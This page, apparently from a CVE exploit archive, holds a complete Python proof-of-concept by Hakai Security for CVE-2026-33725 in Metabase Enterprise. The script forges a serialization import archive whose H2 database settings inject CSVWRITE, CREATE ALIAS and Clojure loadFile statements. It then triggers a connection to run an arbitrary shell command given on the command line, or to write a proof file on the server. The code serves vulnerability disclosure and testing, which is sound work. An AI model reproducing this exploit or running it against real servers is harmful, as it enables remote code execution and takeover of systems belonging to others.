5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
# Hakai Security - https://hakaisecurity.io 
# Authors:
# - Diego Tellaroli <[email protected]>
# - Guilherme d'Ávila <[email protected]>
# - Gabriel Rodrigues <[email protected]>
#
# Created on: 2026-04-20
# Description: Exploit for CVE-2026-33725 - Metabase vulnerable to RCE and Arbitrary File Read via H2 JDBC INIT Injection in EE Serialization Import

#!/usr/bin/env python3

import argparse, io, tarfile, time, requests, urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TS = int(time.time())


def banner():
    b = """
_____________________________________________________________________________________
______  ___  _________ ___ ____  _____
___  / / /_/   |___/ //_/_/   |__/   _/ / RCE and Arbitrary File Read in Metabase   /
__  /_/ /__ /| |__  , <__  /| |  _/ /  /   CVE - 2026 - 33725                      /
_  __  /_  ___ |_  /| |_  ___ |__/ /  /     https://hakaisecurity.io              /
/_/ /_/ /_/  |_|/_/ |_|/_/  |_|/___/ /                                           /
________________________________________________________________________________
    """
    print(b)

def db_yaml(name, subname):
    return f"""\
name: {name}
engine: h2
description: poc
settings: {{}}
serdes/meta:
- id: {name}
  model: Database
details:
  db: mem:x
  subname: |-
    {subname}
"""

def cmd_to_clj(cmd):
    """Encode string as Clojure char literals to avoid quotes in CSVWRITE output.
    Double backslash because H2 URL parser strips one level: \\\\c -> \\c."""
    special = {' ': 'space', '\n': 'newline', '\t': 'tab'}
    parts = []
    for c in cmd:
        if c in special:
            parts.append(f"\\\\{special[c]}")
        elif c == '\\':
            parts.append("\\\\\\\\")
        else:
            parts.append(f"\\\\{c}")
    return "(str " + " ".join(parts) + ")"

def build_rce_clj(cmd):
    """Build Clojure source that runs an OS command via clojure.java.shell/sh."""
    return (
        "(require (quote clojure.java.shell))"
        f"(clojure.java.shell/sh {cmd_to_clj('/bin/sh')} {cmd_to_clj('-c')} {cmd_to_clj(cmd)})"
    )

def build_targz(entries):
    """entries: list of (db_name, yaml_content)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for d in ["export/", "export/databases/"]:
            ti = tarfile.TarInfo(d); ti.type = tarfile.DIRTYPE; tar.addfile(ti)
        for name, yaml in entries:
            d = f"export/databases/{name}/"
            ti = tarfile.TarInfo(d); ti.type = tarfile.DIRTYPE; tar.addfile(ti)
            data = yaml.encode()
            ti = tarfile.TarInfo(f"export/databases/{name}/{name}.yaml")
            ti.size = len(data)
            tar.addfile(ti, io.BytesIO(data))
    buf.seek(0)
    return buf

def find_db(s, base, name):
    r = s.get(f"{base}/api/database")
    if r.ok:
        for db in r.json().get("data", r.json() if isinstance(r.json(), list) else []):
            if db.get("name") == name:
                return db["id"]
    return None

def delete_db(s, base, name):
    db_id = find_db(s, base, name)
    if db_id:
        s.delete(f"{base}/api/database/{db_id}")

def trigger(s, base, db_id):
    """Force JDBC connection -> fires H2 INIT."""
    s.post(f"{base}/api/database/{db_id}/sync_schema")
    s.post(f"{base}/api/database/{db_id}/rescan_values")
    s.post(f"{base}/api/dataset", json={
        "database": db_id, "type": "native", "native": {"query": "SELECT 1"}
    })

def do_import(s, base, entries):
    """Import tar.gz, return (status_code, body)."""
    s.headers.pop("Content-Type", None)
    r = s.post(f"{base}/api/ee/serialization/import",
               files={"file": ("export.tar.gz", build_targz(entries), "application/gzip")})
    s.headers["Content-Type"] = "application/json"
    return r.status_code, r.text[:3000]

def main():
    banner()
    p = argparse.ArgumentParser(description="CVE-2026-33725: H2 INIT injection via EE serdes import")
    p.add_argument("url", help="Metabase base URL")
    p.add_argument("token", help="Admin session token")
    p.add_argument("--cmd", help="OS command for RCE (Clojure loadFile, no javac)")
    p.add_argument("--outfile", default="/tmp/metabase_poc_pwned.txt", help="Proof file (safe mode)")
    p.add_argument("--dry-run", action="store_true", help="Only check endpoint")
    p.add_argument("--proxy", help="HTTP proxy")
    a = p.parse_args()
    base = a.url.rstrip("/")

    s = requests.Session()
    s.headers.update({"Content-Type": "application/json", "X-Metabase-Session": a.token})
    if a.proxy:
        s.proxies = {"http": a.proxy, "https": a.proxy}; s.verify = False

    # Check EE
    r = s.post(f"{base}/api/ee/serialization/import")
    if r.status_code == 404:
        print("[SAFE] OSS build — endpoint not available"); return
    elif r.status_code == 402:
        print("[INFO] EE build (needs license)")
    else:
        print(f"[INFO] Endpoint returned HTTP {r.status_code}")
    if a.dry_run:
        return

    if a.cmd:
        # ── RCE: single-INIT three-statement chain ──
        # All in one file-based H2 INIT: CSVWRITE -> CREATE ALIAS -> CALL loadFile
        # File-based H2 serializes connections, avoiding CREATE ALIAS race.
        print(f"[INFO] RCE: {a.cmd}")
        clj_file = f"/tmp/.poc_{TS}.clj"
        h2_file = f"/tmp/.poc_{TS}_h2"
        name = f"poc_rce_{TS}"

        clj_src = build_rce_clj(a.cmd)
        sql_inner = clj_src.replace("'", "''''")
        csvwrite = f"CALL CSVWRITE('{clj_file}', 'SELECT ''{sql_inner}'' AS c', 'writeColumnHeader=false fieldDelimiter=')"
        create_alias = 'CREATE ALIAS IF NOT EXISTS LOADCLJ FOR "clojure.lang.Compiler.loadFile"'
        call_load = f"CALL LOADCLJ('{clj_file}')"

        # \; separates statements in H2 INIT
        subname = f"{h2_file};INIT={csvwrite}\\;{create_alias}\\;{call_load}"

        delete_db(s, base, name)
        code, body = do_import(s, base, [(name, db_yaml(name, subname))])
        print(f"[INFO] Import: HTTP {code}")

        if code == 402:
            print("[INFO] License required"); return
        if code != 200 or "assert-not-h2" in body.lower():
            print(body[:500]); print("[SAFE] Patched or import failed"); return

        time.sleep(2)
        db_id = find_db(s, base, name)
        if db_id:
            trigger(s, base, db_id)
            print(f"\n[VULN] RCE via H2 INIT subname bypass + Clojure loadFile")
            print(f"[INFO] Verify: check if '{a.cmd}' executed on the server")
        else:
            print("[WARN] DB not found after import")

    else:
        # ── Safe mode: CSVWRITE proof file ──
        name = f"poc_safe_{TS}"
        sub = f"mem:s{TS};INIT=CALL CSVWRITE('{a.outfile}', 'SELECT ''PWNED_VIA_H2_INIT'' AS result')"

        delete_db(s, base, name)
        code, body = do_import(s, base, [(name, db_yaml(name, sub))])
        print(f"[INFO] Import: HTTP {code}")

        if code == 402:
            print("[INFO] License required"); return
        if code != 200:
            print(body[:500]); return
        if "assert-not-h2" in body.lower():
            print("[SAFE] Patched (H2 rejected)"); return

        time.sleep(2)
        db_id = find_db(s, base, name)
        if db_id:
            trigger(s, base, db_id)
            print(f"\n[VULN] CSVWRITE via H2 INIT subname bypass")
            print(f"[INFO] Check: {a.outfile}")
        else:
            print("[WARN] DB not found after import")

if __name__ == "__main__":
    main()